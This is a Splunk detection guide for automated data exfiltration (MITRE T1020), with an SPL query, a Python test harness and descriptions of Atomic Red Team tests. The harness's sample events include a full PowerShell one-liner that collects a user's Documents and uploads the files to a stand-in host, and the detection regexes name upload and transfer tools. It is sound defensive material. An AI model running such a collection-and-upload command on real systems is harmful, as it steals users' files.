Detect Automated Exfiltration in Splunk
Adversaries may exfiltrate data through the use of automated processing after being gathered during collection. Automated exfiltration commonly involves scripted or programmatic transfer of collected files to attacker-controlled infrastructure on a schedule or triggered basis. This technique is frequently combined with T1041 (Exfiltration Over C2 Channel) or T1048 (Exfiltration Over Alternative Protocol) to move data out of the network. Real-world examples include StrongPity automatically uploading collected documents, Rover scanning local drives on a 60-minute cycle, Raccoon Stealer acting on received configuration files, and Ke3chang performing frequent scheduled exfiltration from compromised networks.
MITRE ATT&CK
- Tactic: Exfiltration
- Technique: T1020 Automated Exfiltration
- Canonical reference: https://attack.mitre.org/techniques/T1020/
SPL Detection Query
```Branch 1: scripting engines with collection + upload patterns (Sysmon Process Create)```
index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
(Image="*\\powershell.exe" OR Image="*\\pwsh.exe" OR Image="*\\python.exe" OR Image="*\\python3.exe"
OR Image="*\\wscript.exe" OR Image="*\\cscript.exe" OR Image="*\\cmd.exe")
| eval cmdl=lower(CommandLine)
| eval HasUpload=if(match(cmdl,"(uploadfile|uploaddata|uploadstring|start-bitstransfer|net\.ftpwebrequest|invoke-webrequest.*put|invoke-restmethod.*put)"),1,0)
| eval HasCollection=if(match(cmdl,"(get-childitem|\bgci\b|dir\s+/s|get-content|\[io\.file\]::|compress-archive|-recurse)"),1,0)
| eval HasTransferTool=if(match(cmdl,"(curl\s|wget\s|ftp\s-|\bsftp\s)"),1,0)
| eval SensitivePath=if(match(cmdl,"(\\\\documents\\\\|\\\\desktop\\\\|\\\\downloads\\\\|\\\\appdata\\\\|\\\\programdata\\\\|\\\\temp\\\\)"),1,0)
| eval ExfilScore=HasUpload + HasCollection + HasTransferTool + SensitivePath
| where ExfilScore >= 2
| table _time, host, User, Image, CommandLine, ParentImage, ParentCommandLine, HasUpload, HasCollection, HasTransferTool, SensitivePath, ExfilScore
| eval Branch="scripting_engine"
| append [
search index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
(Image="*\\curl.exe" OR Image="*\\wget.exe" OR Image="*\\certutil.exe" OR Image="*\\bitsadmin.exe"
OR Image="*\\ftp.exe" OR Image="*\\sftp.exe" OR Image="*\\scp.exe")
| eval cmdl=lower(CommandLine)
| eval IsUpload=if(match(cmdl,"(-t\s|--upload-file|\-d\s@|--data-binary\s@|\bput\b|\bpost\b|/transfer|/upload|ftp://|sftp://|ftps://)"),1,0)
| eval IsExternal=if(match(CommandLine,"(ftp|sftp|ftps|http|https)://") AND NOT match(CommandLine,"(10\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[0-1])\.|127\.)"),1,0)
| where IsUpload=1
| table _time, host, User, Image, CommandLine, ParentImage, ParentCommandLine, IsUpload, IsExternal
| eval Branch="transfer_tool"
]
| append [
search index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
(Image="*\\7z.exe" OR Image="*\\7za.exe" OR Image="*\\rar.exe" OR Image="*\\winrar.exe" OR Image="*\\tar.exe")
| eval cmdl=lower(CommandLine)
| eval HasSensitiveSrc=if(match(cmdl,"(\\\\documents|\\\\desktop|\\\\users|\\\\programdata|\\\\appdata)"),1,0)
| where HasSensitiveSrc=1
| eval ArchiveTime=_time
| eval ArchiveHost=host
| join type=inner max=0 host [
search index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=3
NOT (DestinationIp="10.*" OR DestinationIp="192.168.*" OR DestinationIp="127.*")
| where NOT match(DestinationIp, "^172\.(1[6-9]|2[0-9]|3[01])\.")
| eval NetTime=_time
| rename Image AS NetImage
| table host, NetTime, NetImage, DestinationIp, DestinationPort
]
| where (NetTime - ArchiveTime) >= 0 AND (NetTime - ArchiveTime) <= 300
| table _time, ArchiveTime, host, User, Image, CommandLine, NetImage, DestinationIp, DestinationPort
| eval Branch="archive_then_network"
]
| sort - _time
Three-branch detection for automated exfiltration: Branch 1 scores scripting engine invocations on upload capability + collection behavior + transfer-tool usage + sensitive path access (threshold score >= 2). Branch 2 detects dedicated transfer tools (curl, wget, certutil, bitsadmin, ftp, sftp, scp) with upload/PUT/POST flags and marks whether the destination URL is external. Branch 3 correlates archive tool activity against sensitive source paths with every subsequent outbound connection to a non-private address from the same host within 5 minutes (join max=0, so each archive run is compared against all of that host's connections rather than only the first). All branches use Sysmon EventCode=1 (Process Create); Branch 3 additionally uses EventCode=3 (Network Connect).
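To check the scoring and the time-window correlation without a Splunk instance, the following Python re-implements Branch 1 and Branch 3 of the query above over constructed Sysmon-style records. This is an added example, not code from the page or from Splunk: the regexes are transcribed from the SPL evals, the event dictionaries mirror Sysmon field names, the hosts, paths and IP addresses are constructed sample data, and the `parent_allowlist` tuning knob (one way to suppress the backup and sync-client false positives listed below) is an assumption, not something the query itself does.

```python
import re

# --- Branch 1 patterns, transcribed from the page's SPL evals (run on the lower-cased CommandLine) ---
UPLOAD_RE = re.compile(r"(uploadfile|uploaddata|uploadstring|start-bitstransfer|net\.ftpwebrequest|"
                       r"invoke-webrequest.*put|invoke-restmethod.*put)")
COLLECTION_RE = re.compile(r"(get-childitem|\bgci\b|dir\s+/s|get-content|\[io\.file\]::|compress-archive|-recurse)")
TRANSFER_RE = re.compile(r"(curl\s|wget\s|ftp\s-|\bsftp\s)")
SENSITIVE_RE = re.compile(r"(\\documents\\|\\desktop\\|\\downloads\\|\\appdata\\|\\programdata\\|\\temp\\)")
SCRIPT_ENGINES = {"powershell.exe", "pwsh.exe", "python.exe", "python3.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
# --- Branch 3 patterns ---
ARCHIVERS = {"7z.exe", "7za.exe", "rar.exe", "winrar.exe", "tar.exe"}
ARCHIVE_SRC_RE = re.compile(r"(\\documents|\\desktop|\\users|\\programdata|\\appdata)")
# Whole RFC 1918 space plus loopback, i.e. the same ranges Branch 2's IsExternal regex excludes
PRIVATE_RE = re.compile(r"^(10\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[01])\.|127\.)")


def basename(path):
    """Lower-cased file name of a Windows image path (what Image="*\\x.exe" matches on)."""
    return path.lower().rsplit("\\", 1)[-1]


def score_scripting_event(ev):
    """Branch 1: ExfilScore components for one Sysmon EventCode=1 record, or None if not a script engine."""
    if ev["EventCode"] != 1 or basename(ev["Image"]) not in SCRIPT_ENGINES:
        return None
    cmdl = ev["CommandLine"].lower()
    flags = {
        "HasUpload": int(bool(UPLOAD_RE.search(cmdl))),
        "HasCollection": int(bool(COLLECTION_RE.search(cmdl))),
        "HasTransferTool": int(bool(TRANSFER_RE.search(cmdl))),
        "SensitivePath": int(bool(SENSITIVE_RE.search(cmdl))),
    }
    flags["ExfilScore"] = sum(flags.values())
    return flags


def archive_then_network(events, window=300):
    """Branch 3: every non-private EventCode=3 connection from the same host within `window`
    seconds after an archive-tool run over a sensitive path (all pairs, like SPL join max=0)."""
    archives = [e for e in events if e["EventCode"] == 1 and basename(e["Image"]) in ARCHIVERS
                and ARCHIVE_SRC_RE.search(e["CommandLine"].lower())]
    conns = [e for e in events if e["EventCode"] == 3 and not PRIVATE_RE.match(e["DestinationIp"])]
    hits = []
    for a in archives:
        for c in conns:
            delta = c["_time"] - a["_time"]
            if c["host"] == a["host"] and 0 <= delta <= window:
                hits.append({"host": a["host"], "ArchiveTime": a["_time"], "Image": basename(a["Image"]),
                             "NetImage": basename(c["Image"]), "DestinationIp": c["DestinationIp"],
                             "DestinationPort": c["DestinationPort"], "Delay": delta})
    return hits


def run_detection(events, threshold=2, parent_allowlist=()):
    """Branch 1 hits (score >= threshold) plus Branch 3 hits. Branch 1 hits whose parent process is an
    allow-listed agent are dropped (assumed tuning knob for backup / sync-client noise, not in the SPL)."""
    allow = {p.lower() for p in parent_allowlist}
    hits = []
    for ev in events:
        s = score_scripting_event(ev)
        if s and s["ExfilScore"] >= threshold and basename(ev.get("ParentImage", "")) not in allow:
            hits.append({"Branch": "scripting_engine", "host": ev["host"], "Image": basename(ev["Image"]), **s})
    for h in archive_then_network(events):
        hits.append({"Branch": "archive_then_network", **h})
    return hits


T0 = 1_700_000_000  # constructed epoch base for the sample records
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CURL = r"C:\Windows\System32\curl.exe"
SAMPLE_EVENTS = [  # constructed Sysmon-style records, not real telemetry
    # collection + upload + sensitive path: score 3
    {"EventCode": 1, "_time": T0, "host": "WS01", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell -c Get-ChildItem C:\Users\bob\Documents\* -Recurse | % { "
                    r"(New-Object Net.WebClient).UploadFile('http://203.0.113.10:8443/u', $_.FullName) }"},
    # collection only, non-sensitive path: score 1, below threshold
    {"EventCode": 1, "_time": T0 + 5, "host": "WS01", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell -c Get-ChildItem C:\Build"},
    # score 3, but spawned by a sync client (suppressed when OneDrive.exe is allow-listed)
    {"EventCode": 1, "_time": T0 + 10, "host": "WS01", "ParentImage": r"C:\Program Files\OneDrive\OneDrive.exe",
     "Image": PS, "CommandLine": r"powershell -c Compress-Archive C:\Users\bob\Desktop\* sync.zip; Start-BitsTransfer"},
    # Branch 3: archive of a user profile, then connections at -50s, +60s, +100s (private), +150s, +800s
    {"EventCode": 1, "_time": T0 + 100, "host": "WS02", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Program Files\7-Zip\7z.exe", "CommandLine": r"7z.exe a C:\Temp\stage.7z C:\Users\alice\Documents\*"},
    {"EventCode": 3, "_time": T0 + 50, "host": "WS02", "Image": CURL, "DestinationIp": "198.51.100.7", "DestinationPort": 443},
    {"EventCode": 3, "_time": T0 + 160, "host": "WS02", "Image": CURL, "DestinationIp": "198.51.100.7", "DestinationPort": 443},
    {"EventCode": 3, "_time": T0 + 200, "host": "WS02", "Image": CURL, "DestinationIp": "172.20.1.5", "DestinationPort": 445},
    {"EventCode": 3, "_time": T0 + 250, "host": "WS02", "Image": r"C:\Windows\System32\OpenSSH\scp.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 22},
    {"EventCode": 3, "_time": T0 + 900, "host": "WS02", "Image": CURL, "DestinationIp": "198.51.100.7", "DestinationPort": 443},
]

if __name__ == "__main__":
    for hit in run_detection(SAMPLE_EVENTS, parent_allowlist=["OneDrive.exe"]):
        print(hit)
```

Running the module prints one scripting_engine hit (score 3) and two archive_then_network hits (the 443 and 22 connections 60 s and 150 s after the archive run); the connection before the archive, the one to 172.20.1.5 and the one 800 s later are all excluded, and the OneDrive-spawned event disappears only when its parent is allow-listed. The nested loop in archive_then_network is the point of the max=0 change: with Splunk's default of one subsearch row per join key, only the earliest connection per host would ever be compared against the window.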
Data Sources
Required Sourcetypes
- XmlWinEventLog:Microsoft-Windows-Sysmon/Operational in index=wineventlog: EventCode=1 (Process Create) for all three branches, EventCode=3 (Network Connect) for Branch 3
False Positives & Tuning
- Backup software agents (Veeam, Acronis) that compress user directories and transfer archives to remote storage servers
- Cloud storage sync clients (OneDrive, Dropbox, Box) that continuously monitor and upload modified files from user profile paths
- Log shippers and monitoring agents (Splunk Universal Forwarder, Elastic Agent) running on schedule to collect and push log files
- Developer tooling (Git LFS, artifact upload scripts) pushing build outputs to external repositories or package registries
- Managed file transfer solutions (IBM Sterling, GoAnywhere) performing scheduled compliance-required data transfers
Testing Methodology
Validate this detection against 4 Atomic Red Team test cases. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1: PowerShell Automated File Upload via Net.WebClient
Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'Get-ChildItem', '-Recurse', 'Net.WebClient', 'UploadFile'. Sysmon Event ID 3: Network Connection attempts to 127.0.0.1:8443. PowerShell ScriptBlock Log Event ID 4104 with full script including file collection loop.
- Test 2: Scheduled Automated Exfiltration via BitsAdmin Upload
Expected signal: Windows Security Event ID 4698 (A scheduled task was created) with task name 'WindowsTelemetryCollect' and action 'bitsadmin /transfer exfil /upload'. Sysmon Event ID 1 for schtasks.exe process creation. Microsoft-Windows-TaskScheduler/Operational Event ID 106 (task registered). When the task fires: Sysmon Event ID 1 for bitsadmin.exe with /upload flag in CommandLine.
- Test 3: Python Script Recursive Collection and Staged Archive Upload
Expected signal: Sysmon Event ID 1: Process Create with Image=python.exe, CommandLine containing 'zipfile', 'os.walk', 'Documents', 'urllib.request', 'POST'. Sysmon Event ID 11: File Create for collect_df00tech.zip in %TEMP% directory. Sysmon Event ID 3: Network Connection attempt to 127.0.0.1:8080. DeviceFileEvents (MDE) will show the archive creation.
- Test 4: Curl-Based Automated File Exfiltration Loop (Linux/macOS)
Expected signal: Linux auditd: execve syscall events for bash and curl with full argument arrays. Syslog: process execution records. If Sysmon for Linux is deployed: Event ID 1 (Process Create) with CommandLine containing 'find', '-name', 'curl', '-X POST', '-F file=@'. Network: connection attempts from curl to 127.0.0.1:9090. File access events for each file POSTed.
References
- https://attack.mitre.org/techniques/T1020/
- https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/
- https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
- https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
- https://www.welivesecurity.com/2019/05/07/turla-lightneuron-email-too-far/
- https://attack.mitre.org/software/S0409/
- https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-devicenetworkevents-table
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-devicefileevents-table
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md